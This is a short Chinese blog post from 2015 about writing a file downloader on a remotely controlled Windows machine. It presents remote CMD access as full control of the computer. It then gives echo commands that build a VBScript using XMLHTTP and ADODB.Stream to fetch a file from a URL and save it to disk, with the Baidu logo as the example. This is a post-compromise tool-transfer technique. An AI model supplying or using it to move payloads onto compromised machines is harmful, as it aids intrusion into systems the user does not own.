2015年12月16日 星期三

远程CMD 编写下载文件脚本

如果拿到远程CMD权限,基本上这台电脑就被你完全控制了。你想执行什么,直接编写个小程序传过去执行就可以了。不过CMD没有直接的下载文件命令,所以我们得编写一个脚本。代码如下: echo Set xPost = createObject("Microsoft.XMLHTTP") >dc.vbs echo xPost.Open "GET",https://www.baidu.com/img/bd_logo1.png,0 >>dc.vbs echo xPost.Send() >>dc.vbs echo Set sGet = createObject("ADODB.Stream") >>dc.vbs echo sGet.Mode = 3 >>dc.vbs echo sGet.Type = 1 >>dc.vbs echo sGet.Open() >>dc.vbs echo sGet.Write(xPost.responseBody) >>dc.vbs echo sGet.SaveToFile "c:\bd_logo1.png",2 >>dc.vbs